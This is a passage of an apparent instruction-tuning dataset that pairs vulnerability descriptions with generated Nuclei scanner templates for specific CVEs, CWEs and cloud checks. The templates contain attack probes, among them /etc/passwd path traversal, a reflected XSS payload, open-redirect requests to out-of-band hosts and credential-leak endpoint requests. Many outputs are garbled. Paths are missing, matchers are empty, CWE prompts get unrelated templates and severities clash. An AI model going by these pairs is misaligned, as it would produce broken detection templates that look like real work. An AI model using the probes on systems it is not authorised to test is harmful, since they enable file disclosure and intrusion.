gladinet centrestack, gladinet triofox\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-11371\n\ninfo:\n name: Gladinet CentreStack & TrioFox - Local File Inclusion\n author: Kazgangap\n severity: medium\n description: In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560\n tags: cve,cve2025,gladinet,lfi,centrestack,vkev,vuln,kev\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2025-11371"} +{"instruction": "Generate a Nuclei template for CVE-2021-42887", "input": "Title: Unknown Vulnerability in totolink ex1200t_firmware\nSummary: In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can bypass login by sending a specific request through formLoginAuth.htm.\nVulnerability Type: Unknown Vulnerability\nSeverity: critical\nAffected Products: totolink ex1200t_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-42887\n\ninfo:\n name: TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass\n author: gy741\n severity: critical\n description: TOTOLINK EX1200T 4.1.2cu.5215 is susceptible to authentication bypass. An attacker can bypass login by sending a specific request through formLoginAuth.htm, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve2021,cve,totolink,auth-bypass,router,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"TOTOLINK\" \n part: body_1\n - type: word\n words:\n - \"Set-Cookie: SESSION_ID=\" \n part: header_2\n - type: status\n status:\n - 302", "category": "cve", "severity": "critical", "id": "CVE-2021-42887"} +{"instruction": "Generate a Nuclei template for CVE-2020-24550", "input": "Title: Vulnerability (CWE-601) in episerver find\nSummary: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: episerver find\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-24550\n\ninfo:\n name: EpiServer Find <13.2.7 - Open Redirect\n author: dhiyaneshDK\n severity: medium\n description: EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve,cve2020,redirect,episerver,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh\" \n matchers:\n - type: word\n words:\n - \"Location: https://interact.sh\" \n part: header\n - type: status\n status:\n - 301", "category": "cve", "severity": "medium", "id": "CVE-2020-24550"} +{"instruction": "Generate a Nuclei template for CVE-2021-24235", "input": "Title: Cross-Site Scripting (XSS) in boostifythemes goto\nSummary: The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: boostifythemes goto\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24235\n\ninfo:\n name: WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Goto Tour & Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page.\n tags: cve2021,cve,xss,wp-theme,wpscan,wordpress,boostifythemes,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13\" \n matchers:\n - type: word\n words:\n - \"input/Autofocus/%0D*/Onfocus=alert(123);\" \n - \"goto-tour-list-js-extra\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-24235"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: phoronix-panel\n\ninfo:\n name: Phoronix Test Suite Panel - Detect\n author: pikpikcu\n severity: info\n description: Phoronix Test Suite panel was detected.\n tags: panel,phoronix,phoronix-media,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: uptimerobot takeover detection", "input": "Title: uptimerobot takeover detection\nSummary: uptimerobot takeover detection. uptimerobot takeover was detected.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: uptimerobot-takeover\n\ninfo:\n name: uptimerobot takeover detection\n author: pdteam\n severity: low\n description: uptimerobot takeover was detected.\n tags: takeover,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: regex\n - type: word\n words:\n - \"Server: Caddy\" \n part: header\n - type: status\n status:\n - 404", "category": "generic", "severity": "low", "id": "uptimerobot-takeover"} +{"instruction": "Generate a Nuclei template for CVE-2023-5003", "input": "Title: Unknown Vulnerability in miniorange active_directory_integration_\\/_ldap_integration\nSummary: The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: miniorange active_directory_integration_\\/_ldap_integration\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-5003\n\ninfo:\n name: Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure\n author: s4e-io\n severity: high\n description: The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.\n tags: wpscan,exposure,csv,ldap,wordpress,wp-plugin,cve,cve2023,miniorange,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/ldap-authentication-report.csv\" \n matchers:\n - type: word\n words:\n - \"ID\" \n - \"USERNAME\" \n - \"TIME\" \n - \"LDAP STATUS\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2023-5003"} +{"instruction": "Generate a Nuclei template for: Default Google-Managed Encryption for Cloud SQL Not Restricted", "input": "Title: Default Google-Managed Encryption for Cloud SQL Not Restricted\nSummary: Default Google-Managed Encryption for Cloud SQL Not Restricted. Ensure that the use of Google-managed encryption keys for Cloud SQL database instances is disabled at the GCP organization level in order to enforce the use of Customer-Managed Keys (CMKs) and have full control over SQL database encryption/decryption process. Note: This organization policy is not retroactive, therefore any existing database instances using Google-managed encryption are not impacted unless they are updated or refresh\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-org-sql-default-encryption\n\ninfo:\n name: Default Google-Managed Encryption for Cloud SQL Not Restricted\n author: princechaddha\n severity: medium\n description: Ensure that the use of Google-managed encryption keys for Cloud SQL database instances is disabled at the GCP organization level in order to enforce the use of Customer-Managed Keys (CMKs) and have full control over SQL database encryption/decryption process. Note: This organization policy is not retroactive, therefore any existing database instances using Google-managed encryption are not impacted unless they are updated or refreshed.\n tags: cloud,devops,gcp,gcloud,resourcemanager,security,sql,encryption,cmk,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-org-sql-default-encryption"} +{"instruction": "Generate a Nuclei template for: Expired ACM Certificates", "input": "Title: Expired ACM Certificates\nSummary: Expired ACM Certificates. Ensure removal of expired SSL/TLS certificates in AWS Certificate Manager to comply with Amazon Security Best Practices.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: acm-cert-expired\n\ninfo:\n name: Expired ACM Certificates\n author: princechaddha\n severity: high\n description: Ensure removal of expired SSL/TLS certificates in AWS Certificate Manager to comply with Amazon Security Best Practices.\n tags: cloud,devops,aws,amazon,acm,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "acm-cert-expired"} +{"instruction": "Generate a Nuclei template for: Webp Server Go - Path Traversal", "input": "Title: Webp Server Go - Path Traversal\nSummary: Webp Server Go - Path Traversal. Webp Server Go has an Path Traversal vulnerability. Attackers can use the vulnerability to access arbitraty file.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: webp-server-lfi\n\ninfo:\n name: Webp Server Go - Path Traversal\n author: ritikchaddha\n severity: high\n description: Webp Server Go has an Path Traversal vulnerability. Attackers can use the vulnerability to access arbitraty file.\n tags: webp,webp-server,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../../../../../../../../../../../etc/passwd\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "webp-server-lfi"} +{"instruction": "Generate a Nuclei template for: python phishing Detection", "input": "Title: python phishing Detection\nSummary: python phishing Detection. A python phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: python-phish\n\ninfo:\n name: python phishing Detection\n author: rxerium\n severity: info\n description: A python phishing website was detected\n tags: phishing,python,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Welcome to Python.org\" \n - \"The official home of the Python Programming Language\" \n condition: and\n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "python-phish"} +{"instruction": "Generate a Nuclei template for CVE-2023-6786", "input": "Title: Vulnerability (CWE-601) in hkdigit payment_gateway_for_telcell\nSummary: The Payment Gateway for Telcell WordPress plugin through 2.0.1 does not validate the api_url parameter before redirecting the user to its value, leading to an Open Redirect issue\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: hkdigit payment_gateway_for_telcell\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-6786\n\ninfo:\n name: Payment Gateway for Telcell < 2.0.4 - Open Redirect\n author: s4e-io\n severity: medium\n description: The plugin does not validate the api_url parameter before redirecting the user to its value, leading to an Open Redirect issue\n tags: cve,cve2023,wordpress,redirect,wp-plugin,wp,payment-gateway-for-telcell,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin.php?page=wc-settings&action=redirect_telcell_form&api_url=https://oast.me\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2023-6786"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - JD API", "input": "Title: Content-Security-Policy Bypass - JD API\nSummary: Content-Security-Policy Bypass - JD API. Tags: xss, csp-bypass, jd-api\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: jd-api-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - JD API\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - JD API\n tags: xss,csp-bypass,jd-api,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"jd.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "jd-api-csp-bypass"} +{"instruction": "Generate a Nuclei template for CVE-2023-28432", "input": "Title: Information Disclosure in minio minio\nSummary: Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including `MINIO_SECRET_KEY`\nand `MINIO_ROOT_PASSWORD`, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.\nVulnerability Type: Information Disclosure\nSeverity: high\nAffected Products: minio minio\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-28432\n\ninfo:\n name: MinIO Cluster Deployment - Information Disclosure\n author: Mr-xn\n severity: high\n description: MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.\n tags: cve,cve2023,minio,console,exposure,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"MINIO_ROOT_PASSWORD\":\" \n - \"\"MINIO_ROOT_USER\":\" \n - \"\"MinioEnv\":\" \n part: body\n condition: or\n - type: word\n words:\n - \"text/plain\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2023-28432"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: sonicwall-email-security-detect\n\ninfo:\n name: SonicWall Email Security Panel - Detect\n author: gy741\n severity: info\n description: SonicWall Email Security panel was detected.\n tags: tech,panel,sonicwall,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/favicon.ico\" \n matchers:\n - type: dsl", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2015-4694", "input": "Title: Path Traversal in zip_attachments_project zip_attachments\nSummary: Directory traversal vulnerability in download.php in the Zip Attachments plugin before 1.5.1 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the za_file parameter.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: zip_attachments_project zip_attachments\nIndicators: error, vulnerability detected", "output": "id: CVE-2015-4694\n\ninfo:\n name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval\n author: 0x_Akoko\n severity: high\n description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.\n tags: cve2015,cve,wp-plugin,wpscan,lfi,wordpress,zip_attachments_project,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2015-4694"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: manageengine-adselfservice\n\ninfo:\n name: ZOHO ManageEngine ADSelfService Plus - Detect\n author: dhiyaneshDK,SaK1\n severity: info\n description: ZOHO ManageEngine ADSelfService panel was detected.\n tags: panel,zoho,manageengine,zohocorp,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/authorization.do\" \n - \"{{BaseURL}}/servlet/GetProductVersion\" \n matchers:\n - type: word\n words:\n - \"ADSelfService Plus\" \n - \"\"PRODUCT_NAME\":\"ManageEngine ADSelfService\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: gigapan\n\ninfo:\n name: Gigapan User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Gigapan user name information check was conducted.\n tags: osint,osint-hobby,gigapan,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.gigapan.com/profiles/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"width=\"100\"\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Use of Hard-coded Credentials", "input": "Title: Use of Hard-coded Credentials (CWE-798)\nSummary: The product contains hard-coded credentials, such as a password or cryptographic key. There are two main variations: \n\t\t Inbound: the product contains an authentication mechanism that checks the input credentials against a hard-coded set of credentials. In this variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cann\nVulnerability Type: Use of Hard-coded Credentials\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: cobbler-default-login\n\ninfo:\n name: Cobbler Default Login\n author: c-sh0\n severity: high\n description: Cobbler default login credentials for the testing module (testing/testing) were discovered.\n tags: cobbler,default-login,api,seclists,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"text/xml\" \n part: header\n - type: dsl\n condition: or\n - type: regex\n part: body", "category": "cwe", "severity": "high", "id": "CWE-798"} +{"instruction": "Generate a Nuclei template for: RDP - Detection", "input": "Title: RDP - Detection\nSummary: RDP - Detection. Detects if a target host is running Remote Desktop Protocol (RDP) service on port 3389. This template helps identify Windows systems that have RDP enabled, which is commonly used for remote administration but can also be a security risk if not properly secured.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: rdp-detect\n\ninfo:\n name: RDP - Detection\n author: pussycat0x\n severity: info\n description: Detects if a target host is running Remote Desktop Protocol (RDP) service on port 3389. This template helps identify Windows systems that have RDP enabled, which is commonly used for remote administration but can also be a security risk if not properly secured.\n tags: js,network,rdp,info,enum,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "rdp-detect"} +{"instruction": "Generate a Nuclei template for: Check for Unrestricted Oracle Database Access", "input": "Title: Check for Unrestricted Oracle Database Access\nSummary: Check for Unrestricted Oracle Database Access. Ensure that Google Cloud VPC network firewall rules do not allow unrestricted access (0.0.0.0/0 on TCP port 1521). Restrict Oracle Database traffic to trusted IP addresses or IP ranges to reduce the attack surface and enhance security.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: gcloud-unrestricted-oracle-db-access\n\ninfo:\n name: Check for Unrestricted Oracle Database Access\n author: princechaddha\n severity: high\n description: Ensure that Google Cloud VPC network firewall rules do not allow unrestricted access (0.0.0.0/0 on TCP port 1521). Restrict Oracle Database traffic to trusted IP addresses or IP ranges to reduce the attack surface and enhance security.\n tags: cloud,devops,gcp,gcloud,vpc,firewall,security,oracle,db,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "gcloud-unrestricted-oracle-db-access"} +{"instruction": "Generate a Nuclei template for CVE-2025-57788", "input": "Title: Vulnerability (CWE-259) in commvault commvault\nSummary: A vulnerability in a known login mechanism allows unauthenticated attackers to execute API calls without requiring user credentials. RBAC helps limit the exposure but does not eliminate risk.\nVulnerability Type: Vulnerability (CWE-259)\nSeverity: medium\nAffected Products: commvault commvault\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-57788\n\ninfo:\n name: Commvault Unauthenticated Password Disclosure (WT-2025-0047)\n author: DhiyaneshDK,iamnoooob,pdresearch,watchtowr\n severity: medium\n description: An issue was discovered in Commvault before 11.36.60. A vulnerability in a known login mechanism allows unauthenticated attackers to execute API calls without requiring user credentials. RBAC helps limit the exposure but does not eliminate risk.\n tags: cve,cve2025,commandcenter,commvault,unauth,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"cv-gorkha\" \n part: body\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"_+_PublicSharingUser_\" \n - \"Public Sharing User\" \n - \"token\" \n part: body\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2025-57788"} +{"instruction": "Generate a Nuclei template for CVE-2024-13496", "input": "Title: SQL Injection in gamipress gamipress\nSummary: The GamiPress \u2013 Gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby\u2019 parameter in all versions up to, and including, 7.3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. NOTE: This vulnerability was previously published as being fixed in version 7.2.2 which was incorrect. The correct fixed version is 7.3.2.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: gamipress gamipress\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-13496\n\ninfo:\n name: GamiPress <= 2.8.9 - SQL Injection\n author: ritikchaddha\n severity: high\n description: GamiPress WordPress plugin version 2.8.9 and below suffers from an SQL injection vulnerability due to insufficient sanitization of user input, allowing attackers to execute arbitrary SQL commands.\n tags: cve,cve2024,wp,wordpress,gamipress,sqli,wp-plugin,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2024-13496"} +{"instruction": "Generate a Nuclei template for: MagnusBilling - Login Panel", "input": "Title: MagnusBilling - Login Panel\nSummary: MagnusBilling - Login Panel. Identified an exposed MagnusBilling login panel.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: mbilling-panel\n\ninfo:\n name: MagnusBilling - Login Panel\n author: DhiyaneshDK\n severity: info\n description: Identified an exposed MagnusBilling login panel.\n tags: mbilling,login,panel,magnusbilling,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/mbilling/\" \n matchers:\n - type: word\n words:\n - \"MagnusBilling\" \n - \"Voip System\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "mbilling-panel"} +{"instruction": "Generate a Nuclei template for CVE-2024-38514", "input": "Title: Vulnerability (CWE-918) in CVE-2024-38514\nSummary: NextChat is a cross-platform ChatGPT/Gemini UI. There is a Server-Side Request Forgery (SSRF) vulnerability due to a lack of validation of the `endpoint` GET parameter on the WebDav API endpoint. This SSRF can be used to perform arbitrary HTTPS request from the vulnerable instance (MKCOL, PUT and GET methods supported), or to target NextChat users and make them execute arbitrary JavaScript code in their browser. This vulnerability has been patched in version 2.12.4.\n\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: high\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-38514\n\ninfo:\n name: NextChat - Server-Side Request Forgery\n author: DhiyaneshDk\n severity: high\n description: NextChat v2.12.3 suffers from a Server-Side Request Forgery (SSRF) and Cross-Site Scripting vulnerability due to a lack of validation of the GET parameter on the WebDav API endpoint.\n tags: cve,cve2024,ssrf,xss,chatgpt,nextchat,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"__NEXT_DATA__\" \n part: body", "category": "cve", "severity": "high", "id": "CVE-2024-38514"} +{"instruction": "Generate a Nuclei template for CVE-2023-3849", "input": "Title: Cross-Site Scripting (XSS) in moosocial moodating\nSummary: A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-235200. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: low\nAffected Products: moosocial moodating\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-3849\n\ninfo:\n name: mooDating 1.2 - Cross-site scripting\n author: r3Y3r53\n severity: medium\n description: A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.\n tags: cve2023,cve,packetstorm,xss,unauth,moodating,moosocial,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/find-a-matchpksyk\">s9a64?\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "low", "id": "CVE-2023-3849"} +{"instruction": "Generate a Nuclei template for CVE-2024-57045", "input": "Title: Authentication Bypass in dlink dir-859_a3_firmware\nSummary: A vulnerability in the D-Link DIR-859 router with firmware version A3 1.05 and earlier permits unauthorized individuals to bypass the authentication. An attacker can obtain a user name and password by forging a post request to the / getcfg.php page.\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: dlink dir-859_a3_firmware\nIndicators: unauthorized", "output": "id: CVE-2024-57045\n\ninfo:\n name: D-Link DIR-859 - Information Disclosure\n author: ritikchaddha\n severity: critical\n description: A critical information disclosure vulnerability exists in D-Link devices where sensitive device account information including credentials can be retrieved by sending an unauthenticated request to `/getcfg.php` endpoint with the parameter `SERVICES=DEVICE.ACCOUNT`. This could allow attackers to obtain administrative credentials and gain full control of the affected device.\n tags: cve,cve2024,dlink,disclosure,unauth,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n - \"\" \n - \"\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/xml\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2024-57045"} +{"instruction": "Generate a Nuclei template for: Google (GCP) Service-account", "input": "Title: Google (GCP) Service-account\nSummary: Google (GCP) Service-account. Tags: file, keys, token\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: gcp-service-account\n\ninfo:\n name: Google (GCP) Service-account\n author: gaurang\n severity: low\n description: Google (GCP) Service-account\n tags: file,keys,token,google\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "gcp-service-account"} +{"instruction": "Generate a Nuclei template for: Remote Registry Service Disabled Check", "input": "Title: Remote Registry Service Disabled Check\nSummary: Remote Registry Service Disabled Check. Ensure the Remote Registry Service is disabled to block remote access to the Windows registry. Allowing remote registry access can lead to unauthorized changes and pose a serious security risk.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: remote-registry-access-check\n\ninfo:\n name: Remote Registry Service Disabled Check\n author: nukunga[SungHyunJeon]\n severity: medium\n description: Ensure the Remote Registry Service is disabled to block remote access to the Windows registry. Allowing remote registry access can lead to unauthorized changes and pose a serious security risk.\n tags: code,windows-audit,kisa,registry,remote-access\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "remote-registry-access-check"} +{"instruction": "Generate a Nuclei template for: Slack Config Refresh Token", "input": "Title: Slack Config Refresh Token\nSummary: Slack Config Refresh Token. Tags: exposure, token, slack\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: slack-config-refresh-token\n\ninfo:\n name: Slack Config Refresh Token\n author: DhiyaneshDK\n severity: info\n description: Slack Config Refresh Token\n tags: exposure,token,slack,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "slack-config-refresh-token"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: symfony-security-config\n\ninfo:\n name: Symfony Security Configuration File - Detect\n author: dahse89\n severity: info\n description: Symfony security configuration file was detected.\n tags: config,exposure,symfony,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/config/packages/security.yaml\" \n - \"{{BaseURL}}/app/config/security.yml\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - 